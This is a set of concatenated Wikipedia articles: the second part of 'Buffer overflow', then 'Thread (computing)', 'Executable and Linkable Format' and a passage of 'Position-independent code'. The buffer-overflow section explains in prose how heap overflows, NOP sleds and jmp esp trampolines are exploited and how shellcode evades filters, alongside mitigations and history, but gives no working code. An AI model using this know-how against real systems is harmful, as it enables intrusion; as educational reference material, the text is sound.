system.[4] A buffer overflow occurring in the heap data area is referred to as a heap overflow and is exploitable in a manner different from that of stack-based overflows. Memory on the heap is dynamically allocated by the application at run-time and typically contains program data. Exploitation is performed by corrupting this data in specific ways to cause the application to overwrite internal structures such as linked list pointers. The canonical heap overflow technique overwrites dynamic memory allocation linkage (such asmallocmeta data) and uses the resulting pointer exchange to overwrite a program function pointer. Microsoft'sGDI+vulnerability in handlingJPEGsis an example of the danger a heap overflow can present.[5] Manipulation of the buffer, which occurs before it is read or executed, may lead to the failure of an exploitation attempt. These manipulations can mitigate the threat of exploitation, but may not make it impossible. Manipulations could include conversion to upper or lower case, removal ofmetacharactersand filtering out of non-alphanumericstrings. However, techniques exist to bypass these filters and manipulations, such asalphanumeric shellcode,polymorphic code,self-modifying code, andreturn-to-libc attacks. The same methods can be used to avoid detection byintrusion detection systems. In some cases, including where code is converted intoUnicode,[6]the threat of the vulnerability has been misrepresented by the disclosers as only Denial of Service when in fact the remote execution of arbitrary code is possible. In real-world exploits there are a variety of challenges which need to be overcome for exploits to operate reliably. These factors include null bytes in addresses, variability in the location of shellcode, differences between environments, and various counter-measures in operation. A NOP-sled is the oldest and most widely known technique for exploiting stack buffer overflows.[7]It solves the problem of finding the exact address of the buffer by effectively increasing the size of the target area. To do this, much larger sections of the stack are corrupted with theno-opmachine instruction. At the end of the attacker-supplied data, after the no-op instructions, the attacker places an instruction to perform a relative jump to the top of the buffer where theshellcodeis located. This collection of no-ops is referred to as the "NOP-sled" because if the return address is overwritten with any address within the no-op region of the buffer, the execution will "slide" down the no-ops until it is redirected to the actual malicious code by the jump at the end. This technique requires the attacker to guess where on the stack the NOP-sled is instead of the comparatively small shellcode.[8] Because of the popularity of this technique, many vendors ofintrusion prevention systemswill search for this pattern of no-op machine instructions in an attempt to detect shellcode in use. A NOP-sled does not necessarily contain only traditional no-op machine instructions. Any instruction that does not corrupt the machine state to a point where the shellcode will not run can be used in place of the hardware assisted no-op. As a result, it has become common practice for exploit writers to compose the no-op sled with randomly chosen instructions which will have no real effect on the shellcode execution.[9] While this method greatly improves the chances that an attack will be successful, it is not without problems. Exploits using this technique still must rely on some amount of luck that they will guess offsets on the stack that are within the NOP-sled region.[10]An incorrect guess will usually result in the target program crashing and could alert thesystem administratorto the attacker's activities. Another problem is that the NOP-sled requires a much larger amount of memory in which to hold a NOP-sled large enough to be of any use. This can be a problem when the allocated size of the affected buffer is too small and the current depth of the stack is shallow (i.e., there is not much space from the end of the current stack frame to the start of the stack). Despite its problems, the NOP-sled is often the only method that will work for a given platform, environment, or situation, and as such it is still an important technique. The "jump to register" technique allows for reliable exploitation of stack buffer overflows without the need for extra room for a NOP-sled and without having to guess stack offsets. The strategy is to overwrite the return pointer with something that will cause the program to jump to a known pointer stored within a register which points to the controlled buffer and thus the shellcode. For example, if register A contains a pointer to the start of a buffer then any jump or call taking that register as an operand can be used to gain control of the flow of execution.[11] In practice a program may not intentionally contain instructions to jump to a particular register. The traditional solution is to find an unintentional instance of a suitableopcodeat a fixed location somewhere within the program memory. FigureEon the left contains an example of such an unintentional instance of the i386jmp espinstruction. The opcode for this instruction isFF E4.[12]This two-byte sequence can be found at a one-byte offset from the start of the instructioncall DbgPrintat address0x7C941EED. If an attacker overwrites the program return address with this address the program will first jump to0x7C941EED, interpret the opcodeFF E4as thejmp espinstruction, and will then jump to the top of the stack and execute the attacker's code.[13] When this technique is possible the severity of the vulnerability increases considerably. This is because exploitation will work reliably enough to automate an attack with a virtual guarantee of success when it is run. For this reason, this is the technique most commonly used inInternet wormsthat exploit stack buffer overflow vulnerabilities.[14] This method also allows shellcode to be placed after the overwritten return address on theWindowsplatform. Since executables are mostly based at address0x00400000and x86 is alittle endianarchitecture, the last byte of the return address must be a null, which terminates the buffer copy and nothing is written beyond that. This limits the size of the shellcode to the size of the buffer, which may be overly restrictive.DLLsare located in high memory (above0x01000000) and so have addresses containing no null bytes, so this method can remove null bytes (or other disallowed characters) from the overwritten return address. Used in this way, the method is often referred to as "DLL trampolining". Various techniques have been used to detect or prevent buffer overflows, with various tradeoffs. The following sections describe the choices and implementations available. Assembly,C, andC++are popular programming languages that are vulnerable to buffer overflow in part because they allow direct access to memory and are notstrongly typed.[15]C provides no built-in protection against accessing or overwriting data in any part of memory. More specifically, it does not check that data written to a buffer is within the boundaries of that buffer. The standard C++ libraries provide many ways of safely buffering data, and C++'sStandard Template Library(STL) provides containers that can optionally perform bounds checking if the programmer explicitly calls for checks while accessing data. For example, avector's member functionat()performs a bounds check and throws anout_of_rangeexceptionif the bounds check fails.[16]However, C++ behaves just like C if the bounds check is not explicitly called. Techniques to avoid buffer overflows also exist for C. Languages that are strongly typed and do not allow direct memory access, such as COBOL, Java, Eiffel, Python, and others, prevent buffer overflow in most cases.[15]Many programming languages other than C or C++ provide runtime checking and in some cases even compile-time checking which might send a warning or raise an exception, while C or C++ would overwrite data and continue to execute instructions until erroneous results are obtained, potentially causing the program to crash. Examples of such languages includeAda,Eiffel,Lisp,Modula-2,Smalltalk,OCamland such C-derivatives asCyclone,RustandD. TheJavaand.NET Frameworkbytecode environments also require bounds checking on all arrays. Nearly everyinterpreted languagewill protect against buffer overflow, signaling a well-defined error condition. Languages that provide enough type information to do bounds checking often provide an option to enable or disable it.Static code analysiscan remove many dynamic bound and type checks, but poor implementations and awkward cases can significantly decrease performance. Software engineers should carefully consider the tradeoffs of safety versus performance costs when deciding which language and compiler setting to use. The problem of buffer overflows is common in the C and C++ languages because they expose low level representational details of buffers as containers for data types. Buffer overflows can be avoided by maintaining a high degree of correctness in code that performs buffer management. It has also long been recommended to avoid standard library functions that are not bounds checked, such asgets,scanfandstrcpy. TheMorris wormexploited agetscall infingerd.[17] Well-written and tested abstract data type libraries that centralize and automatically perform buffer management, including bounds checking, can reduce the occurrence and impact of buffer overflows. The primary data types in languages in which buffer overflows are common are strings and arrays. Thus, libraries preventing buffer overflows in these data types can provide the vast majority of the necessary coverage. However, failure to use these safe libraries correctly can result in buffer overflows and other vulnerabilities, and naturally anybugin the library is also a potential vulnerability. "Safe" library implementations include "The Better String Library",[18]Vstr[19]and Erwin.[20]TheOpenBSDoperating system'sC libraryprovides thestrlcpyandstrlcatfunctions, but these are more limited than full safe library implementations. In September 2007, Technical Report 24731, prepared by the C standards committee, was published.[21]It specifies a set of functions that are based on the standard C library's string and IO functions, with additional buffer-size parameters. However, the efficacy of these functions for reducing buffer overflows is disputable. They require programmer intervention on a per function call basis that is equivalent to intervention that could make the analogous older standard library functions buffer overflow safe.[22] Buffer overflow protection is used to detect the most common buffer overflows by checking that thestackhas not been altered when a function returns. If it has been altered, the program exits with asegmentation fault. Three such systems are Libsafe,[23]and theStackGuard[24]andProPolice[25]gccpatches. Microsoft's implementation ofData Execution Prevention(DEP) mode explicitly protects the pointer to theStructured Exception Handler(SEH) from being overwritten.[26] Stronger stack protection is possible by splitting the stack in two: one for data and one for function returns. This split is present in theForth language, though it was not a security-based design decision. Regardless, this is not a complete solution to buffer overflows, as sensitive data other than the return address may still be overwritten. This type of protection is also not entirely accurate because it does not detect all attacks. Systems like StackGuard are more centered around the behavior of the attacks, which makes them efficient and faster in comparison to range-check systems.[27] Buffer overflows work by manipulatingpointers, including stored addresses. PointGuard was proposed as a compiler-extension to prevent attackers from reliably manipulating pointers and addresses.[28]The approach works by having the compiler add code to automatically XOR-encode pointers before and after they are used. Theoretically, because the attacker does not know what value will be used to encode and decode the pointer, one cannot predict what the pointer will point to if it is overwritten with a new value. PointGuard was never released, but Microsoft implemented a similar approach beginning inWindows XPSP2 andWindows Server 2003SP1.[29]Rather than implement pointer protection as an automatic feature, Microsoft added an API routine that can be called. This allows for better performance (because it is not used all of the time), but places the burden on the programmer to know when its use is necessary. Because XOR is linear, an attacker may be able to manipulate an encoded pointer by overwriting only the lower bytes of an address. This can allow an attack to succeed if the attacker can attempt the exploit multiple times or complete an attack by causing a pointer to point to one of several locations (such as any location within a NOP sled).[30]Microsoft added a random rotation to their encoding scheme to address this weakness to partial overwrites.[31] Executable space protection is an approach to buffer overflow protection that prevents execution of code on the stack or the heap. An attacker may use buffer overflows to insert arbitrary code into the memory of a program, but with executable space protection, any attempt to execute that code will cause an exception. Some CPUs support a feature calledNX("No eXecute") orXD("eXecute Disabled") bit, which in conjunction with software, can be used to markpages of data(such as those containing the stack and the heap) as readable and writable but not executable. Some Unix operating systems (e.g.OpenBSD,macOS) ship with executable space protection (e.g.W^X). Some optional packages include: Newer variants of Microsoft Windows also support executable space protection, calledData Execution Prevention.[35]Proprietaryadd-ons include: Executable space protection does not generally protect againstreturn-to-libc attacks, or any other attack that does not rely on the execution of the attackers code. However, on64-bitsystems usingASLR, as described below, executable space protection makes it far more difficult to execute such attacks. CHERI (Capability Hardware Enhanced RISC Instructions) is a computer processor technology designed to improve security. It operates at a hardware level by providing a hardware-enforced type (a CHERI capability) that authorises access to memory. Traditional pointers are replaced by addresses accompanied by metadata that limit what can be accessed through any given pointer. Address space layout randomization (ASLR) is a computer security feature that involves arranging the positions of key data areas, usually including the base of the executable and position of libraries, heap, and stack, randomly in a process' address space. Randomization of thevirtual memoryaddresses at which functions and variables can be found can make exploitation of a buffer overflow more difficult, but not impossible. It also forces the attacker to tailor the exploitation attempt to the individual system, which foils the attempts ofinternet worms.[38]A similar but less effective method is torebaseprocesses and libraries in the virtual address space. The use of deep packet inspection (DPI) can detect, at the network perimeter, very basic remote attempts to exploit buffer overflows by use of attack signatures andheuristics. This technique can block packets that have the signature of a known attack. It was formerly used in situations in which a long series of No-Operation instructions (known as a NOP-sled) was detected and the location of the exploit'spayloadwas slightly variable. Packet scanning is not an effective method since it can only prevent known attacks and there are many ways that a NOP-sled can be encoded.Shellcodeused by attackers can be madealphanumeric,metamorphic, orself-modifyingto evade detection by heuristic packet scanners andintrusion detection systems. Checking for buffer overflows and patching the bugs that cause them helps prevent buffer overflows. One common automated technique for discovering them isfuzzing.[39]Edge case testing can also uncover buffer overflows, as can static analysis.[40]Once a potential buffer overflow is detected it should be patched. This makes the testing approach useful for software that is in development, but less useful for legacy software that is no longer maintained or supported. Buffer overflows were understood and partially publicly documented as early as 1972, when the Computer Security Technology Planning Study laid out the technique: "The code performing this function does not check the source and destination addresses properly, permitting portions of the monitor to be overlaid by the user. This can be used to inject code into the monitor that will permit the user to seize control of the machine."[41]Today, the monitor would be referred to as the kernel. The earliest documented hostile exploitation of a buffer overflow was in 1988. It was one of several exploits used by theMorris wormto propagate itself over the Internet. The program exploited was aserviceonUnixcalledfinger.[42]Later, in 1995, Thomas Lopatic independently rediscovered the buffer overflow and published his findings on theBugtraqsecurity mailing list.[43]A year later, in 1996,Elias Levy(also known as Aleph One) published inPhrackmagazine the paper "Smashing the Stack for Fun and Profit",[44]a step-by-step introduction to exploiting stack-based buffer overflow vulnerabilities. Since then, at least two major internet worms have exploited buffer overflows to compromise a large number of systems. In 2001, theCode Red wormexploited a buffer overflow in Microsoft'sInternet Information Services(IIS) 5.0[45]and in 2003 theSQL Slammerworm compromised machines runningMicrosoft SQL Server 2000.[46] In 2003, buffer overflows present in licensedXboxgames have been exploited to allow unlicensed software, includinghomebrew games, to run on the console without the need for hardware modifications, known asmodchips.[47]ThePS2 Independence Exploitalso used a buffer overflow to achieve the same for thePlayStation 2. The Twilight hack accomplished the same with theWii, using a buffer overflow inThe Legend of Zelda: Twilight Princess.
https://en.wikipedia.org/wiki/Buffer_overflow
Incomputer science, athreadofexecutionis the smallest sequence of programmed instructions that can be managed independently by ascheduler, which is typically a part of theoperating system.[1]In many cases, a thread is a component of aprocess. The multiple threads of a given process may be executedconcurrently(via multithreading capabilities), sharing resources such asmemory, while different processes do not share these resources. In particular, the threads of a process share its executable code and the values of itsdynamically allocatedvariables and non-thread-localglobal variablesat any given time. The implementation of threads andprocessesdiffers between operating systems.[2][page needed] Threads made an early appearance under the name of "tasks" in IBM's batch processing operating system, OS/360, in 1967. It provided users with three available configurations of theOS/360control system, of whichMultiprogramming with a Variable Number of Tasks(MVT) was one. Saltzer (1966) creditsVictor A. Vyssotskywith the term "thread".[3] The use of threads in software applications became more common in the early 2000s as CPUs began to utilize multiple cores. Applications wishing to take advantage of multiple cores for performance advantages were required to employ concurrency to utilize the multiple cores.[4] Scheduling can be done at the kernel level or user level, and multitasking can be donepreemptivelyorcooperatively. This yields a variety of related concepts. At the kernel level, aprocesscontains one or morekernel threads, which share the process's resources, such as memory and file handles – a process is a unit of resources, while a thread is a unit of scheduling and execution. Kernel scheduling is typically uniformly done preemptively or, less commonly, cooperatively. At the user level a process such as aruntime systemcan itself schedule multiple threads of execution. If these do not share data, as in Erlang, they are usually analogously called processes,[5]while if they share data they are usually called(user) threads, particularly if preemptively scheduled. Cooperatively scheduled user threads are known asfibers; different processes may schedule user threads differently. User threads may be executed by kernel threads in various ways (one-to-one, many-to-one, many-to-many). The term "light-weight process" variously refers to user threads or to kernel mechanisms for scheduling user threads onto kernel threads. Aprocessis a "heavyweight" unit of kernel scheduling, as creating, destroying, and switching processes is relatively expensive. Processes ownresourcesallocated by the operating system. Resources include memory (for both code and data),file handles, sockets, device handles, windows, and aprocess control block. Processes areisolatedbyprocess isolation, and do not share address spaces or file resources except through explicit methods such as inheriting file handles or shared memory segments, or mapping the same file in a shared way – seeinterprocess communication. Creating or destroying a process is relatively expensive, as resources must be acquired or released. Processes are typically preemptively multitasked, and process switching is relatively expensive, beyond basic cost ofcontext switching, due to issues such as cache flushing (in particular, process switching changes virtual memory addressing, causing invalidation and thus flushing of an untaggedtranslation lookaside buffer(TLB), notably on x86). Akernel threadis a "lightweight" unit of kernel scheduling. At least one kernel thread exists within each process. If multiple kernel threads exist within a process, then they share the same memory and file resources. Kernel threads are preemptively multitasked if the operating system's processscheduleris preemptive. Kernel threads do not own resources except for astack, a copy of theregistersincluding theprogram counter, andthread-local storage(if any), and are thus relatively cheap to create and destroy. Thread switching is also relatively cheap: it requires a context switch (saving and restoring registers and stack pointer), but does not change virtual memory and is thus cache-friendly (leaving TLB valid). The kernel can assign one or more software threads to each core in a CPU (it being able to assign itself multiple software threads depending on its support for multithreading), and can swap out threads that get blocked. However, kernel threads take much longer than user threads to be swapped. Threads are sometimes implemented inuserspacelibraries, thus calleduser threads. The kernel is unaware of them, so they are managed and scheduled in userspace. Some implementations base their user threads on top of several kernel threads, to benefit frommulti-processormachines (M:N model). User threads as implemented byvirtual machinesare also calledgreen threads. As user thread implementations are typically entirely in userspace, context switching between user threads within the same process is extremely efficient because it does not require any interaction with the kernel at all: a context switch can be performed by locally saving the CPU registers used by the currently executing user thread or fiber and then loading the registers required by the user thread or fiber to be executed. Since scheduling occurs in userspace, the scheduling policy can be more easily tailored to the requirements of the program's workload. However, the use of blocking system calls in user threads (as opposed to kernel threads) can be problematic. If a user thread or a fiber performs a system call that blocks, the other user threads and fibers in the process are unable to run until the system call returns. A typical example of this problem is when performing I/O: most programs are written to perform I/O synchronously. When an I/O operation is initiated, a system call is made, and does not return until the I/O operation has been completed. In the intervening period, the entire process is "blocked" by the kernel and cannot run, which starves other user threads and fibers in the same process from executing. A common solution to this problem (used, in particular, by many green threads implementations) is providing an I/O API that implements an interface that blocks the calling thread, rather than the entire process, by using non-blocking I/O internally, and scheduling another user thread or fiber while the I/O operation is in progress. Similar solutions can be provided for other blocking system calls. Alternatively, the program can be written to avoid the use of synchronous I/O or other blocking system calls (in particular, using non-blocking I/O, including lambda continuations and/or async/awaitprimitives[6]). Fibersare an even lighter unit of scheduling which arecooperatively scheduled: a running fiber must explicitly "yield" to allow another fiber to run, which makes their implementation much easier than kernel oruser threads. A fiber can be scheduled to run in any thread in the same process. This permits applications to gain performance improvements by managing scheduling themselves, instead of relying on the kernel scheduler (which may not be tuned for the application). Some research implementations of theOpenMPparallel programming model implement their tasks through fibers.[7][8]Closely related to fibers arecoroutines, with the distinction being that coroutines are a language-level construct, while fibers are a system-level construct. Threads differ from traditionalmultitaskingoperating-systemprocessesin several ways: Systems such asWindows NTandOS/2are said to havecheapthreads andexpensiveprocesses; in other operating systems there is not so great a difference except in the cost of anaddress-spaceswitch, which on some architectures (notablyx86) results in atranslation lookaside buffer(TLB) flush. Advantages and disadvantages of threads vs processes include: Operating systems schedule threads eitherpreemptivelyorcooperatively.Multi-user operating systemsgenerally favorpreemptive multithreadingfor its finer-grained control over execution time viacontext switching. However, preemptive scheduling may context-switch threads at moments unanticipated by programmers, thus causinglock convoy,priority inversion, or other side-effects. In contrast,cooperative multithreadingrelies on threads to relinquish control of execution, thus ensuring that threadsrun to completion. This can cause problems if a cooperatively multitasked threadblocksby waiting on aresourceor if itstarvesother threads by not yielding control of execution during intensive computation. Until the early 2000s, most desktop computers had only one single-core CPU, with no support forhardware threads, although threads were still used on such computers because switching between threads was generally still quicker than full-processcontext switches. In 2002,Inteladded support forsimultaneous multithreadingto thePentium 4processor, under the namehyper-threading; in 2005, they introduced the dual-corePentium Dprocessor andAMDintroduced the dual-coreAthlon 64 X2processor. Systems with a single processor generally implement multithreading bytime slicing: thecentral processing unit(CPU) switches between differentsoftware threads. Thiscontext switchingusually occurs frequently enough that users perceive the threads or tasks as running in parallel (for popular server/desktop operating systems, maximum time slice of a thread, when other threads are waiting, is often limited to 100–200ms). On amultiprocessorormulti-coresystem, multiple threads can execute inparallel, with every processor or core executing a separate thread simultaneously; on a processor or core withhardware threads, separate software threads can also be executed concurrently by separate hardware threads. Threads created by the user in a 1:1 correspondence with schedulable entities in the kernel[9]are the simplest possible threading implementation.OS/2andWin32used this approach from the start, while onLinuxtheGNU C Libraryimplements this approach (via theNPTLor olderLinuxThreads). This approach is also used bySolaris,NetBSD,FreeBSD,macOS, andiOS. AnM:1 model implies that all application-level threads map to one kernel-level scheduled entity;[9]the kernel has no knowledge of the application threads. With this approach, context switching can be done very quickly and, in addition, it can be implemented even on simple kernels which do not support threading. One of the major drawbacks, however, is that it cannot benefit from the hardware acceleration onmultithreadedprocessors ormulti-processorcomputers: there is never more than one thread being scheduled at the same time.[9]For example: If one of the threads needs to execute an I/O request, the whole process is blocked and the threading advantage cannot be used. TheGNU Portable Threadsuses User-level threading, as doesState Threads. M:Nmaps someMnumber of application threads onto someNnumber of kernel entities,[9]or "virtual processors." This is a compromise between kernel-level ("1:1") and user-level ("N:1") threading. In general, "M:N" threading systems are more complex to implement than either kernel or user threads, because changes to both kernel and user-space code are required[clarification needed]. In the M:N implementation, the threading library is responsible for scheduling user threads on the available schedulable entities; this makes context switching of threads very fast, as it avoids system calls. However, this increases complexity and the likelihood ofpriority inversion, as well as suboptimal scheduling without extensive (and expensive) coordination between the userland scheduler and the kernel scheduler. SunOS4.x implementedlight-weight processesor LWPs.NetBSD2.x+, andDragonFly BSDimplement LWPs as kernel threads (1:1 model). SunOS 5.2 through SunOS 5.8 as well as NetBSD 2 to NetBSD 4 implemented a two level model, multiplexing one or more user level threads on each kernel thread (M:N model). SunOS 5.9 and later, as well as NetBSD 5 eliminated user threads support, returning to a 1:1 model.[10]FreeBSD 5 implemented M:N model. FreeBSD 6 supported both 1:1 and M:N, users could choose which one should be used with a given program using /etc/libmap.conf. Starting with FreeBSD 7, the 1:1 became the default. FreeBSD 8 no longer supports the M:N model. Incomputer programming,single-threadingis the processing of oneinstructionat a time.[11]In the formal analysis of the variables'semanticsand process state, the termsingle threadingcan be used differently to mean "backtracking within a single thread", which is common in thefunctional programmingcommunity.[12] Multithreading is mainly found in multitasking operating systems. Multithreading is a widespread programming and execution model that allows multiple threads to exist within the context of one process. These threads share the process's resources, but are able to execute independently. The threaded programming model provides developers with a useful abstraction of concurrent execution. Multithreading can also be applied to one process to enableparallel executionon amultiprocessingsystem. Multithreading libraries tend to provide a function call to create a new thread, which takes a function as a parameter. A concurrent thread is then created which starts running the passed function and ends when the function returns. The thread libraries also offer data synchronization functions. Threads in the same process share the same address space. This allows concurrently running code tocoupletightly and conveniently exchange data without the overhead or complexity of anIPC. When shared between threads, however, even simple data structures become prone torace conditionsif they require more than one CPU instruction to update: two threads may end up attempting to update the data structure at the same time and find it unexpectedly changing underfoot. Bugs caused by race conditions can be very difficult to reproduce and isolate. To prevent this, threadingapplication programming interfaces(APIs) offersynchronization primitivessuch asmutexestolockdata structures against concurrent access. On uniprocessor systems, a thread running into a locked mutex must sleep and hence trigger a context switch. On multi-processor systems, the thread may instead poll the mutex in aspinlock. Both of these may sap performance and force processors insymmetric multiprocessing(SMP) systems to contend for the memory bus, especially if thegranularityof the locking is too fine. Other synchronization APIs includecondition variables,critical sections,semaphores, andmonitors. A popular programming pattern involving threads is that ofthread poolswhere a set number of threads are created at startup that then wait for a task to be assigned. When a new task arrives, it wakes up, completes the task and goes back to waiting. This avoids the relatively expensive thread creation and destruction functions for every task performed and takes thread management out of the application developer's hand and leaves it to a library or the operating system that is better suited to optimize thread management. Multithreaded applications have the following advantages vs single-threaded ones: Multithreaded applications have the following drawbacks: Many programming languages support threading in some capacity.
https://en.wikipedia.org/wiki/Thread_(computing)
Incomputing, theExecutable and Linkable Format[2](ELF, formerly namedExtensible Linking Format) is a common standardfile formatforexecutablefiles,object code,shared libraries, andcore dumps. First published in the specification for theapplication binary interface(ABI) of theUnixoperating system version namedSystem V Release 4(SVR4),[3]and later in the Tool Interface Standard,[1]it was quickly accepted among different vendors ofUnixsystems. In 1999, it was chosen as the standard binary file format for Unix andUnix-likesystems onx86processors by the86openproject. By design, the ELF format is flexible, extensible, andcross-platform. For instance, it supports differentendiannessesand address sizes so it does not exclude any particularCPUorinstruction set architecture. This has allowed it to be adopted by many differentoperating systemson many different hardwareplatforms. Each ELF file is made up of one ELF header, followed by file data. The data can include: The segments contain information that is needed forrun timeexecution of the file, while sections contain important data for linking and relocation. Anybytein the entire file can be owned by one section at most, and orphan bytes can occur which are unowned by any section. The ELF header defines whether to use32-bitor64-bitaddresses. The header contains three fields that are affected by this setting and offset other fields that follow them. The ELF header is 52 or 64 bytes long for 32-bit and 64-bit binaries, respectively. glibc 2.12+ in casee_ident[EI_OSABI] == 3treats this field as ABI version of thedynamic linker:[6]it defines a list of dynamic linker's features,[7]treatse_ident[EI_ABIVERSION]as a feature level requested by the shared object (executable or dynamic library) and refuses to load it if an unknown feature is requested, i.e.e_ident[EI_ABIVERSION]is greater than the largest known feature.[8] [9] The program header table tells the system how to create a process image. It is found at file offsete_phoff, and consists ofe_phnumentries, each with sizee_phentsize. The layout is slightly different in32-bitELF vs64-bitELF, because thep_flagsare in a different structure location for alignment reasons. Each entry is structured as: The ELF format has replaced older executable formats in various environments. It has replaceda.outandCOFFformats inUnix-likeoperating systems: ELF has also seen some adoption in non-Unix operating systems, such as: Microsoft Windowsalso uses the ELF format, but only for itsWindows Subsystem for Linuxcompatibility system.[17] Some game consoles also use ELF: Other (operating) systems running on PowerPC that use ELF: Some operating systems for mobile phones and mobile devices use ELF: Some phones can run ELF files through the use of a patch that adds assembly code to the main firmware, which is a feature known asELFPackin the underground modding culture. The ELF file format is also used with theAtmel AVR(8-bit), AVR32[22]and with Texas Instruments MSP430 microcontroller architectures. Some implementations of Open Firmware can also load ELF files, most notably Apple's implementation used in almost all PowerPC machines the company produced. 86openwas a project to form consensus on a common binary file format for Unix and Unix-like operating systems on the common PC compatible x86 architecture, to encourage software developers to port to the architecture.[24]The initial idea was to standardize on a small subset of Spec 1170, a predecessor of the Single UNIX Specification, and the GNU C Library (glibc) to enable unmodified binaries to run on the x86 Unix-like operating systems. The project was originally designated "Spec 150". The format eventually chosen was ELF, specifically the Linux implementation of ELF, after it had turned out to be ade factostandard supported by all involved vendors and operating systems. The group began email discussions in 1997 and first met together at the Santa Cruz Operation offices on August 22, 1997. The steering committee was Marc Ewing, Dion Johnson, Evan Leibovitch,Bruce Perens, Andrew Roach, Bryan Wayne Sparks and Linus Torvalds. Other people on the project were Keith Bostic, Chuck Cranor, Michael Davidson, Chris G. Demetriou, Ulrich Drepper, Don Dugger, Steve Ginzburg, Jon "maddog" Hall, Ron Holt, Jordan Hubbard, Dave Jensen, Kean Johnston, Andrew Josey, Robert Lipe, Bela Lubkin, Tim Marsland, Greg Page, Ronald Joe Record, Tim Ruckle, Joel Silverstein, Chia-pi Tien, and Erik Troan. Operating systems and companies represented were BeOS, BSDI, FreeBSD,Intel, Linux, NetBSD, SCO and SunSoft. The project progressed and in mid-1998, SCO began developing lxrun, an open-source compatibility layer able to run Linux binaries on OpenServer, UnixWare, and Solaris. SCO announced official support of lxrun at LinuxWorld in March 1999. Sun Microsystems began officially supporting lxrun for Solaris in early 1999,[25]and later moved to integrated support of the Linux binary format via Solaris Containers for Linux Applications. With the BSDs having long supported Linux binaries (through a compatibility layer) and the main x86 Unix vendors having added support for the format, the project decided that Linux ELF was the format chosen by the industry and "declare[d] itself dissolved" on July 25, 1999.[26] FatELF is an ELF binary-format extension that adds fat binary capabilities.[27]It is aimed for Linux and other Unix-like operating systems. Additionally to the CPU architecture abstraction (byte order, word size,CPUinstruction set etc.), there is the potential advantage of software-platform abstraction e.g., binaries which support multiple kernel ABI versions. As of 2021[update], FatELF has not been integrated into the mainline Linux kernel.[28][29][30] [1]
https://en.wikipedia.org/wiki/Executable_and_linkable_format
Incomputing,position-independent code[1](PIC[1]) orposition-independent executable(PIE)[2]is a body ofmachine codethat executes properly regardless of itsmemory address.[a]PIC is commonly used forshared libraries, so that the same library code can be loaded at a location in each program's address space where it does not overlap with other memory in use by, for example, other shared libraries. PIC was also used on older computer systems that lacked anMMU,[3]so that theoperating systemcould keep applications away from each other even within the singleaddress spaceof an MMU-less system. Position-independent code can be executed at any memory address without modification. This differs from absolute code,[1]which must be loaded at a specific location to function correctly,[1]andload-time locatable(LTL) code,[1]in which alinkerorprogram loadermodifies a program before execution, so it can be run only from a particular memory location.[1]The latter terms are sometimes referred to asposition-dependent code.[4]Generating position-independent code is often the default behavior forcompilers, but they may place restrictions on the use of some language features, such as disallowing use of absolute addresses (position-independent code has to userelative addressing). Instructions that refer directly to specific memory addresses sometimes execute faster, and replacing them with equivalent relative-addressing instructions may result in slightly slower execution, although modern processors make the difference practically negligible.[5] In early computers such as theIBM 701[6](29 April 1952) or theUNIVAC I(31 March 1951) code was not position-independent: each program was built to load into and run from a particular address. Those early computers did not have an operating system and were not multitasking-capable. Programs were loaded into main storage (or even stored on magnetic drum for execution directly from there) and run one at a time. In such an operational context, position-independent code was not necessary. Even onbase and bounds[b]systems such as theCDC 6600, theGE 625and theUNIVAC 1107, once the OS loaded code into a job's storage, it could only run from the relative address at which it was loaded. Burroughsintroduced asegmentedsystem, theB5000(1961), in which programs addressed segments indirectly via control words on thestackor in the program reference table (PRT); a shared segment could be addressed via different PRT locations in different processes. Similarly, on the laterB6500, all segment references were via positions in astack frame. TheIBM System/360(7 April 1964) was designed withtruncated addressingsimilar to that of theUNIVAC III,[7]with code position independence in mind. In truncated addressing, memory addresses are calculated from abase registerand an offset. At the beginning of a program, the programmer must establishaddressabilityby loading a base register; normally, the programmer also informs the assembler with aUSINGpseudo-op. The programmer can load the base register from a register known to contain the entry point address, typically R15, or can use theBALR (Branch And Link, Register form)instruction (with a R2 Value of 0) to store the next sequential instruction's address into the base register, which was then coded explicitly or implicitly in each instruction that referred to a storage location within the program. Multiple base registers could be used, for code or for data. Such instructions require less memory because they do not have to hold a full 24, 31, 32, or 64 bit address (4 or 8 bytes), but instead a base register number (encoded in 4 bits) and a 12–bit address offset (encoded in 12 bits), requiring only two bytes. This programming technique is standard on IBM S/360 type systems. It has been in use through to today's IBM System/z. When coding in assembly language, the programmer has to establish addressability for the program as described above and also use other base registers for dynamically allocated storage. Compilers automatically take care of this kind of addressing. IBM's early operating systemDOS/360(1966) was not using virtual storage (since the early models of System S/360 did not support it), but it did have the ability to place programs to an arbitrary (or automatically chosen) storage location during loading via the PHASE name,*JCL (Job Control Language)statement. So, on S/360 systems without virtual storage, a program could be loaded at any storage location, but this required a contiguous memory area large enough to hold that program. Sometimesmemory fragmentationwould occur from loading and unloading differently sized modules. Virtual storage - by design - does not have that limitation. While DOS/360 andOS/360did not support PIC, transientSVC routinesin OS/360 could not contain relocatable address constants and could run in any of the transient areas withoutrelocation. IBM first introduced virtual storage onIBM System/360 model 67in (1965) to support IBM's first multi-tasking operating and time-sharing operating system TSS/360. Later versions of DOS/360 (DOS/VS etc.) and later IBM operating systems all utilized virtual storage. Truncated addressing remained as part of the base architecture, and still advantageous when multiple modules must be loaded into the same virtual address space. By way of comparison, on earlysegmentedsystems such asBurroughs MCPon theBurroughs B5000(1961) andMultics(1964), and on paging systems such as IBMTSS/360(1967)[c], code was also inherently position-independent, since subroutine virtual addresses in a program were located in private data external to the code, e.g., program reference table, linkage segment, prototype section. The invention of dynamic address translation (the function provided by anMMU) originally reduced the need for position-independent code because every process could have its own independentaddress space(range of addresses). However, multiple simultaneous jobs using the same code created a waste of physical memory. If two jobs run entirely identical programs, dynamic address translation provides a solution by allowing the system simply to map two different jobs' address 32K to the same bytes of real memory, containing the single copy of the program. Different programs may share common code. For example, the payroll program and the accounts receivable program may both contain an identical sort subroutine. A shared module (a shared library is a form of shared module) gets loaded once and mapped into the two address spaces. Procedure calls inside a shared library are typically made through small procedure linkage table (PLT)stubs, which then call the definitive function. This notably allows a shared library to inherit certain function calls from previously loaded libraries rather than using its own versions.[8] Data references from position-independent code are usually made indirectly, throughGlobal Offset Tables(GOTs), which store the addresses of all accessedglobal variables. There is one GOT per compilation unit or object module, and it is located at a fixed offset from the code (although this offset is not known until the library islinked). When alinkerlinks modules to create a shared library, it merges the GOTs and sets the final offsets in code. It is not necessary to adjust the offsets when loading the shared library later.[8] Position-independent code that accesses global data does so by fetching the address for the global variable from its entry in the GOT. As the GOT is at a fixed offset from the code, the offset between the address of a given instruction in the code and the address of a GOT entry for a given global variable is also fixed, so that 